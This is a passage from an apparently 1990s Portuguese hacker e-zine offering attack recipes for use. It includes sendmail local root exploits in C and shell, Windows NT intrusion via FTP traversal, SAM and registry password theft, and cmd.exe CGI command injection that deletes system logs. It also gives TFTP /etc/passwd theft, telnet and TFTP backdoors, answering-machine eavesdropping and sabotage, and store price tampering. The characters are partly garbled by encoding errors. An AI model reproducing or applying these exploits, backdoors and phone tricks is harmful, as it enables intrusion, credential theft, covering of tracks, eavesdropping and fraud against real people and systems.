짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩
* Vers찾o : 4.x
* Descri챌찾o : Privilegios de root(l챗r qualquer arquivo)
* Exploit :
ln -s <qualquer arquivo> /usr/tmp/dead.letter

Agora abra o sendmail e envie um email para um usuario que n찾o existe.
Depois de um "cat /urs/tmp/dead.letter >> ~/arquivo"

짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩
* Vers찾o : 5.22
* Descri챌찾o : Root Access
* Exploit :
--------------------------Corte Aki--(/tmp/expoit.c)-------------------------
main(argc,argv)
int argc;
char *argv[];
{
        chown("/tmp/InfamousAngel", 0, 0);
        chmod("/tmp/InfamousAngel", 04755);
}

-----------------------------------------------------------------------------
cc -o /tmp/exploit /tmp/exploit.c
cp /bin/sh /tmp/InfamousAngel
sendmail -oR user -f /tmp/exploit -t

Dentro do sendmail digite o comando: exec /tmp/InfamousAngel

짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩
* Vers찾o : 8.6.7
* Descri챌찾o : Privilegios de root (l챗r qualquer arquivo)
* Exploit :
/usr/lib/sendmail -oE/etc/shadow bounce

Agora mande um email para voce mesmo.

짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩짬쨩
* Vers천es : 8.7 e 8.8.2
* Descri챌찾o : Shell de root
* Exploit :
---------------------------Corte Aki--(leshka.c)-----------------------------
main()
{
execl("/usr/sbin/sendmail","/tmp/smtpd",0);
}
-----------------------------------------------------------------------------
---------------------------Corte Aki--(smtpd.c)------------------------------
main()
{
  setuid(0); setgid(0);
  system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh");
}
-----------------------------------------------------------------------------
cc -o leshka leshka.c
cc -o /tmp/smtpd smtpd.c
./leshka
kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]"
"\n" |head -n 1`
rm leshka.c leshka smtpd.c /tmp/smtpd
/tmp/sh

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$
$$$$$$$              $$$$$$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$
$$$$$$  6. Phreaking  $$$$$$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$
$$$$$$$              $$$$$$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$

-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Secretaria Eletronica.

	%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
	%						%
	%	Acabar com a fita do Coitado! hehe	%
	%						%
	%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

	Pense um pouco! Gaste meio neuronio e voce descubrira'...
	Nao descobriu? Tah bom.. Eu vou dizer.
	A secretaria eletronica atende todas as chamadas e as grava numa fita
bem pequeninha, as mesmas usadas naqueles minigravadores, essas fitas tem um
total de 1 hora de gravacao, dividindo 30 minutos em cada lado.
	Nas secretarias atualmente encontradas no Brasil, que soh gravam msgs
em um lado da fita, e' mais facil de se fazer isso.
	A secretaria atendera' todos os telefonemas, mesmo sendo interurbanos
e/ou a cobrar. hehehe. Espere o kra sair de casa e ligue de um orelhao para a
casa dele. Agora deixe o telefone fora do gancho e va' passear.
	Com isso, dependendo da secretaria eletronica do kra, ou ira' parar
de gravar mensagens ou come챌ara' a regravar desde o inicio da fita. Se a
segunda opcao acontecer, e' um bom metodo para apagar uma ligacao recebida
pelo maneh sem mecher no aparelho.
	Alem de avacalhar com a fita do kra, tb lhe dara' uma srpresinha no
final do mes quando for pagar a conta telefonica. Se o kra deixou uma msg na
secretaria muito longa tipo "Vc ligou para Jose' Anchieta e Maria Punheta,
8827634 no momento nao podemos atende-lo, deixe sua msg apos o sinal e entra-
remos em contato o mais rapido possivel..... PLim!", entao ele talvez nem
disconfie que a chamada foi a cobrar, porque a msg da Central de chamada a
cobrar nao sera' gravada pela Secretaria, pois sera' dada ao mesmo instante
da msg da mesma.
	Ja' avacalhei com uma psicologa daqui de Porto Alegre a 2 anos atras.
Nao, eu nao me consultava com ela, meu irmao sim e ele odiava ela.

	%%%%%%%%%%%%%%%%%%%%%%%%%
	%			%
	%	Security Box	%
	%			%
	%%%%%%%%%%%%%%%%%%%%%%%%%

	E' uma box em fase de teste, porem muito facil de se fazer. Voce so'
vai precisar de um gravador e um aparelho de som que emita sinais de tone.
	O que ela faz e' ouvir as msgs gravadas em uma secretaria eletronica.
	Deixa eu explicar o funcionamento: As secretarias eletronicas atual-
mente vem com uma unidade movel, capaz de fazer o usuario ouvir as msgs gra-
vadas pela secretaria. Isso tambem pode ser feito pelo telefone.
	Primeiro se liga para o numero onde a secretaria esta funcionando,
depois se digita uma senha de 3 digitos.
	Quando a secretaria ouvir o sinal dos 3 tones na sequencia certa, ela
voltara a fita e tocara todas as msgs gravadas.
	Entaum o que voce deve fazer e' gravar todas as sequencias possiveis
de tones(de 3 numeros claro) num minigravador. E assim que a secretaria
atender, toque a fita. Aconselho deixar um espa챌o de 2 segundos entre cada
sequencia, caso contrario aa secretaria pode no funcionar.
	O procedimento mostrado e' de secretarias eletronicas Record A Call -
modelo 2120 . Existem secretarias que com apenas um digito secreto mostrara'
as msgs gravadas(para isso nem precisa de box).
	Talvez em alguns modelos ao inv챕z de esperar uma senha em tone a
secretaria pode esperar em pulse, mas e' pouco provavel.
	A seguir vai uma lista de modelos e digitos conseguida com o grupo
THE LEGION OF PHREAKERS.

Modelo:							No de digitos:

Record A Call - modelo 2120 				3
Gold Star - Modelo 6000/6100				1
Cobra - Modelo AN-8521					2
Uniden - Modelo AM 464					3 a 5

	%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
	%						%
	%	  Escuta via Secretaria Eletronica	%
	%						%
	%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

	Esta e' muito phoda! Voce pode escutar o que estiverem falando na
sala onde estiver a secretaria eletronica.
	Aqui estaremos usando uma Uniden AM 464.
	Fa챌a o seguinte:
1. Ligue para o numero da secretaria;
2. Digite a senha. A senha pode ter de 3 a 5 digitos. A padrao e' 747;
3. Depois do Beep aperte 0 e pronto;
4. De 45 em 45 segundos o aparelho ira beepar para avisar;

	Outros procedimentos desse modelo:
	Siga os mesmos passos 1 e 2...

Aperte 1		-		Passa todas as msgs gravadas.
Aperte 3		-		Regrava a msg da secretaria.
Aperte 5		-		Desliga a secretaria eletronica.
Aperte 6		-		Deletar todas as msgs.
Aperte 7		-		Passa para a proxima msg gravada.
Aperte 8		-		Retocar todas as msgs gravadas.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$
$$$$$$$             $$$$$$$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$
$$$$$$  7. Crackerz  $$$$$$$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$
$$$$$$$             $$$$$$$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Alterando datas.

	Voce pode achar que esta secao tah fraca na zine. E tah mesmo. Mas eu
to tentando colocar coisas faceis de se fazer, para begginers.
	Nao ache que vai ficar assim pra sempre essa secao. O Gabriel Dov
esta na lista dos editores que irao fazer parte dessa secao. O outro sera'
o The Cyborg. O kra e' americano e escreveu um tutorial em ingles. E' soh eu
traduzir rapidinho e ele aparecera' por aki, okz?
	Tah...
	Este foi um programinha que eu fiz em cima da hora para alterar datas
de arquivos de um meio rapidinho. O que ele farah pode ser feito manualmente
no DOS. Eles esta como .bat pq como jah disse fiz em cima da hora e nao tava
afim de perder alguns segundos a + compilando-o :) . Serio. Eu fiz em .bat
porque logo pensei que apenas o begginers se enteresariam por isso entao tah
em .bat pq assim eles podem entender rapidinho.
	Digite 'datecrk' e apareceram as instrucoes de como se usa-lo.

----------------------------Corte Aki--(Datecrk.bat)-------------------------
@echo off
echo.
echo                     Date Cracker feito por Cheat Struck.
echo                     Contato : cszine@hotmail.com
echo.
if %1x==x goto mode
if %2x==x goto mode
if %3x==x goto mode
date %3
type %1 >> crack.crk
del %1
ren crack.crk %1
date %2
echo Arquivo %1
echo Data Atual do arquivo : %3
echo Data Atual do sistema : %2
goto end
:mode
echo.
echo    Voce deve usar este programa na seguinte sintaxe:
echo.
echo    datecrk   [arquivo]   [data atual]    [data crackeada]
echo.
echo    Onde:
echo   [arquivo] e' o arquivo que tera' a data mudada.
echo   [data atual] e' a data atual do seu sistema. Para saber digite 'date'.
echo   [data crackeada] e' a nova data do arquivo.
echo    Facil naum?? :)
goto end
:end
echo.

-----------------------------------------------------------------------------

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$
$$$$$$$                           $$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$
$$$$$$  8. Invas찾o de Privacidade  $#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$
$$$$$$$                           $$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$

-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

	Invadindo WinNT

	Na edi챌찾o numero 14 mostrei uns cinco metodos de invadir o Windows NT
(Que espera um dia substituir o UNIX). Aki vou mostrar umas informa챌천es adi-
cionais que vcs devem saber para hackear um WinNT

	##########
	# CD Bug #
	##########

	Este e' muito simples..
	Ainda e' encontrado em muitos sistemas Windows.
	Abra uma conex찾o Anonima pelo servi챌o FTP. Se vc ainda nao sabe como
entrar anonimo, basta digitar "ftp" ou "anonymous" como login e um email como
senha.
	Ae digite:  cd /C:\
	PLIM!! Vc estah na raiz do servidor. Ag0ra vc se vira para pegar o
arquivo de senhas. Tente tb : get /C:\autoexec.bat
	E vc conseguira' o autoexec.bat do sistema.
	Este metodo foi conseguido com o Grupo THE DEATH KILLERS.
	Pode ser feito no TELNET tamb챕m.

	#################
	# Arquivos .SAM #
	#################

	Arquivos .sam sao tipo backups e NT porem tb podem servir como exem-
plos de arquivos usados.
	Porem estes arquivos podem conter informa챌oes blzas. No WinNT n찾o e-
xiste permis찾o para ler arquivo. Todos podem ler qquer aruivo, entao ao fazer
o truque descrito acima vah no diretorio \winnt\system32\config e pegue todos
os arquivos .sam . Alguma coisa util vc vai encontrar.

	#############
	# REGISTROS #
	#############

	Se vc n찾o sabe como ver os registros do seu windows, va em iniciar /
executar : "c:\windows\regedit.exe"
	Num servidor WinNT vc pode conseguir a senhas e users nos registros.
Aki est찾o os locais onde procurar:

\HKEY_LOCAL_MACHINE\software\microsoft\windowsnt\currentversion\winlogon\

\HKEY_LOCAL_MACHINE\SECURITY\SAM\Domains\Account\Users

\HKEY_LOCAL_MACHINE\system\curentcontrolset\services\XXXXXXX\parameters\
                                                     |
	Aki indique gophersvc, msftpsvc ou w3svc ----+

	###########
	# CMD.EXE #
	###########

	O cmd.exe e' um cgi-bin com defito espantoso(OUTRO??).
	Com ele vc pode executar qquer programa e/ou comando de dos. Vamos
ver os exemplos:

http://host.com/cgi-bin/cmd.exe?/c%20dir%20c:\winnt

	Isto listara todos os arquivos do dir \winnt.

http://host.com/cgi-bin/cmd.exe?/c%20copy%20c:\winnt\*.*%20c:\inetpub\ftproot

	Isto copiara' todos os arquivos e pastas do dir \winnt para o diret처-
rio protegido contra ftp anonymous do servidor. Agora basta entrar por ftp
anonymous e todo o \winnt estar찼 lah.

http://www.hostname.com/cgi-bin/cmd.exe?/c%20date%20/11/97
http://www.host.com/cgi-bin/cmd.exe?/c%20del%20c:\winnt\system32\logfiles\
in980413.log

	Estes ae e' para vc apagar os logs do sistema.
	Primeiro ovc vai mudar a data para 20/11/97 e depois apagara os logs
do dia 13/4/98(dia atual).
	Al챕m de te livrar ainda pode confundir o admin na hora de fechar as
contas dos usuarios no final do mes.

-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$
$$$$$$$                  $$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$
$$$$$$  9. Hack, the Art  $$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$
$$$$$$$                  $$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Obtendo senha de conex찾o no Windows

	Tah ligado quando tu chega na casa de um amigo e tah louco para saber
qual a senha que ele usa para se conectar?? Existe uma maneira de fazer isso
sem nenhum programa adicional.
	Primeiro vc deve verificar se a op챌찾o salvar senha no atalho para a
conex찾o dialup estah abilitada. Se estiver, toda a vez que vc abrir a conex찾o
dial-up a senha jah estara al챠 como xxxxxxx.
	Vc jah deve ter tentado selecionar akilo e copiar mas nao dah naum 챕?
	Entaum onde achar???
	Abra o programa de registro do kra(\windows\regedit.exe) e prcure os
registros de:

\HKEY_USERS\.Default\RemoteAccess\Profile\XXXXXXX

	Onde o XXXXX 챕 o nome do atalho para a conex찾o. Tipo CONEX, CPOVO,
UOL,... Para cada servidor sao dados normalmente seus nomes como nome do ata-
lho.
	Vc tb poder찼 fazer isto ao invadir um host com Win95.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=--==-=-=

	Codigos de Barra.

	Codigos de Barra e' recentemente o meio de criptografia mais utiliza-
do. Mas tem gente que ainda nao entende como e' que funcionam.
	Essa criptografia e' muito utilizada em produtos e supermercados para
indicar o pre챌o.
	Eu vou colocar na pagina da revista um programa gerador de c처digos de
barra(BARS.EXE), mas primeiro vou ensinar como utiliza-lo.
	Ao abrir o programa aparecera a tela about. De OK e vc entrara' no
programa. Clique no botao "New Code" e abrira' uma ImputBox(pra quem conhece
VB).
	Digite agora um numero qquer que escondera' uma msg. Clike OK. Digite
a msg a ser escondida. Clike OK. E' isso que fazem para criptografar em
codigos de barra. Porem, assim como um encriptador tb e' preciso um descrip-
tador.
	Os codigos de barra utilizados nesse programa nao sao iguais ao da
Intel, nem do Supermercado, pois cada local usa os seus codigos de criptacao.
	Se vc conseguir acessar uma rede de supermercado ou compania ou ateh
mesmo lojas, busque pelo encriptador e descriptador, modifique os pre챌os e
mande de volta para a rede no local do antigo.
	Assim vc controla os precos da loja(pelo menos por algum tempo).

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	 Hacking TFTP

	Nao e' novidade que o servico TFTP e' um dos mais inseguros de todo
o protocolo TCP. No Manual de Hacking na inet, escrito por mim, eu cometi um
erro grave. Misturei as bolas do FTP com TFTP(faz tempo que nao encontro esse
servico livre em um sistema).
	Vou mostrar como funciona.
1. Abre o programa TFTP na sua shell de UNIX.
2. Digita CONNECT no prompt 'tftp>'.
3. Digita o endereco/IP do sistema no prompt '(to)'
4. A conexao abrira' sem login nem senha.
5. Digite GET /ETC/PASSWD para pegar o arquivo de senhas do sistema.
6. Digite BYE para fechar a conexao.
	E e' isso. Facil naum??
	Pena que o Windows nao tenha nenhum programa para TFTP neh. :)
	Para colocar uma backdoor nesse servico, vah em inetd.conf e tire o
comentario da sua linha. Depois edite o hosts.allow e adicione a linha:
in.TFTPD: all

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Backdoor para usuarios sem permisao.

	Essa e' outra backdoor que eu descobri. E' muito mole e se baseia em
dar uma shell para um usuario sem permis찾o acessar o telnet. Preety Cool.
	Basta voce editar o /etc/hosts.denny e adicionar a seguinte linha:

in.telnetd: ALL: twist /bin/sh sh -i

	Prontinho!
	Acesse o telnet do sistema sem que seu ip esteja no hosts.allow e vc
caira' numa shell de r첩첩t. Voce nao precisar찼 nem digitar login e senha.
	As backdoors de hoje em dia se baseiam nesses arquivos de permisao e
de shells. Se voce descobrir alguma nova, mande para mim por email.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$
$$$$$$$                 $$$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$
$$$$$$  10. 징징징BoNuS!!!  $$$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$
$$$$$$$                 $$$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Servi챌os gratis na internet

* Email :
 www.hotmail.com
 www.starmail.com
 www.geocities.com
 www.xoom.com

* Home-Pages :
 www.geocities.co
